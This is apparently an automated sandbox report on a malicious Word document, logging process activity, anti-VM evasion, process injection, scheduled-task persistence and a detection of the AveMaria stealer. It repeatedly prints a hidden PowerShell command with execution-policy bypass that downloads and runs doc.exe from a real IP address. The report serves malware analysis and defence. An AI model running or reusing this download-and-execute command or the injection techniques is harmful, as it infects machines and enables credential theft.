            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 00000009.00000002.446591152.00000000023F3000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, type: MEMORY
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2916Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1928Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1832Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2544Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\doc.exe TID: 2828Thread sleep time: -35727s >= -30000s
            Source: C:\Users\user\AppData\Roaming\doc.exe TID: 2824Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\doc.exe TID: 2000Thread sleep count: 60 > 30
            Source: C:\Users\user\AppData\Roaming\doc.exe TID: 2804Thread sleep time: -120000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\doc.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\doc.exeThread delayed: delay time: 35727
            Source: C:\Users\user\AppData\Roaming\doc.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0041002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
            Source: powershell.exe, 00000005.00000002.429199796.00000000002AF000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_00409DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040FF27 FindFirstFileW,FindNextFileW,
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040FA42 LoadLibraryA,GetProcAddress,
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0041094E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_00419172 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_00410619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_00410620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_00401085 GetProcessHeap,RtlAllocateHeap,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\doc.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\AppData\Roaming\doc.exeMemory written: C:\Users\user\AppData\Roaming\doc.exe base: 400000 value starts with: 4D5A
            Injects files into Windows applicationShow sources
            Source: C:\Windows\System32\notepad.exeInjected file: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Bypasses PowerShell execution policyShow sources
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Contains functionality to inject threads in other processesShow sources
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_004079E8 OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_00411FD8 RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\doc.exe 'C:\Users\user\AppData\Roaming\doc.exe'
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\maBdogbw' /XML 'C:\Users\user\AppData\Local\Temp\tmp2C00.tmp'
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe
            Source: C:\Users\user\AppData\Roaming\doc.exeProcess created: C:\Users\user\AppData\Roaming\doc.exe C:\Users\user\AppData\Roaming\doc.exe
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040F56D AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_004118BA InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Roaming\doc.exeQueries volume information: C:\Users\user\AppData\Roaming\doc.exe VolumeInformation
            Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT VolumeInformation
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040F93F cpuid
            Source: C:\Users\user\AppData\Roaming\doc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: 14_2_0040882F GetModuleHandleA,SHGetFolderPathW,lstrcatW,lstrcatW,GetLocalTime,wsprintfW,lstrcatW,CreateFileW,CloseHandle,GetMessageA,TranslateMessage,DispatchMessageA,GetMessageA,

            Lowering of HIPS / PFW / Operating System Security Settings:

            barindex
            Increases the number of concurrent connection per server for Internet ExplorerShow sources
            Source: C:\Users\user\AppData\Roaming\doc.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected AveMaria stealerShow sources
            Source: Yara matchFile source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.doc.exe.36827d0.6.raw.unpack, type: UNPACKEDPE
